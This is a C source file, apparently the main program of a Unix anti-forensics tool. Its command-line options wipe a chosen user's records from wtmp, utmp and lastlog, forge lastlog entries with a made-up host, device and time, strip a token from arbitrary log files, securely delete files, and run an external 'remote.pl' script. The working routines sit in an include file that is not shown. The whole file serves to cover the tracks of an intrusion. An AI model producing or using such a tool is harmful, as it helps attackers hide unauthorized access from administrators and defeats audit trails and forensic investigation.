#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include "inclood.h"

#define WTMPOP 0		/* Comm ops */
#define UTMPOP 1
#define LASTEOP 2
#define LASTWOP 3
#define PLAINOP 4

int SRM = 0;

struct args {			/* Makes things tidy */

char *file;
char *user;
char *time;
char *token;
char *host;
char *dev;
int op;

} argue;

int elements = 0;
int welements = 0;
struct stat stats;

int main(int argc, char *argv[]) {

int opt;
char *optstr = "f:U:t:T:h:d:ns:wuprlL";
extern int SRM;

if(argc<2)
help(argv[0]);

argue.file = NULL;
argue.user = NULL;
argue.time = NULL;
argue.token = NULL;
argue.host = NULL;
argue.dev = NULL;	

while((opt = getopt(argc,argv,optstr)) != EOF) {

	switch(opt) {


		case 'w': {
		argue.op = WTMPOP;
		break; }

		case 'u': {
		argue.op = UTMPOP;
		break; }

		case 'l': {
		argue.op = LASTEOP;
		break; }

		case 'L': {
		argue.op = LASTWOP;
		break; }

		case 'p': {
		argue.op = PLAINOP;
		break; }

		case 'f': {
		argue.file = optarg;
		break; }

		case 'T': {
		argue.token = optarg;
		break; }

		case 't': {
		argue.time = optarg;
		break; }

		case 'U': {
		argue.user = optarg;
		break; }

		case 'h': {
		argue.host = optarg;
		break; }

		case 'd': {
		argue.dev = optarg;
		break; }

		case 'n': {
		SRM = 1;
		break; }

		case 'r': {
		system("./remote.pl");
		exit(0); }

		case 's': {
		printf("%s\n",SVERSION);
		srm(optarg,SRM);
		break; }
    }
   }

		switch(argue.op) {

		  case WTMPOP: {		/* Wtmp wiping */

	  if(argue.user == NULL|| argue.dev == NULL || argue.host == NULL)
		  die("invalid arguments!");

		 printf("Wiping %s for %s...",WTMP,argue.user);
		 if((ump(WTMP,argue.user,argue.dev,argue.host)) != -1)
		 printf("[%d/%d] done\n",welements,elements);
		 else
		 printf("[%d/%d] failed\n",welements,elements);
		 break; 
              }

		  case UTMPOP: {		/* Utmp wiping */

	  if(argue.user == NULL|| argue.dev == NULL || argue.host == NULL)
		  die("invalid arguments!");

		 printf("Wiping %s for %s...",UTMP,argue.user);
		 if((ump(UTMP,argue.user,argue.dev,argue.host)) != -1)
		 printf("[%d/%d] done\n",welements,elements);
		 else
		 printf("[%d/%d] failed\n",welements,elements);
		 break; 
              }

		  case LASTEOP: {		/* Lastlog Editing */

		if(argue.user == NULL || argue.host == NULL \
		 || argue.dev == NULL || argue.time == NULL)
		  die("invalid arguments!");

		 printf("Editing %s for %s...",LASTLOG,argue.user);

		 if((lastlog(argue.user,argue.host,argue.dev,argue.time)) != -1)
		 printf("done\n");
		 else
		 printf("failed\n");
		 break;  
              }

		  case LASTWOP: {		/* Lastlog wiping */
		
		  if(argue.user == NULL)
		   die("invalid arguments!");

		 printf("Wiping %s for %s...",LASTLOG,argue.user);

		 if((lastlog(argue.user,NULL,NULL,NULL)) != -1)
		 printf("done\n");
		 else
		 printf("failed\n");
		 break; 
} 

		  case PLAINOP: {		/* Plainfile wiping */

		   if(argue.file == NULL || argue.token == NULL)
		   die("invalid arguments!");

		 printf("Wiping %s for %s...",argue.file,argue.token);
		 if((pwipe(argue.file,argue.token)) != -1)
		 printf("[%d/%d] done\n",welements,elements);
		 else
		 printf("failed\n");
		 break;  
              }

            }

	
return 0;

}
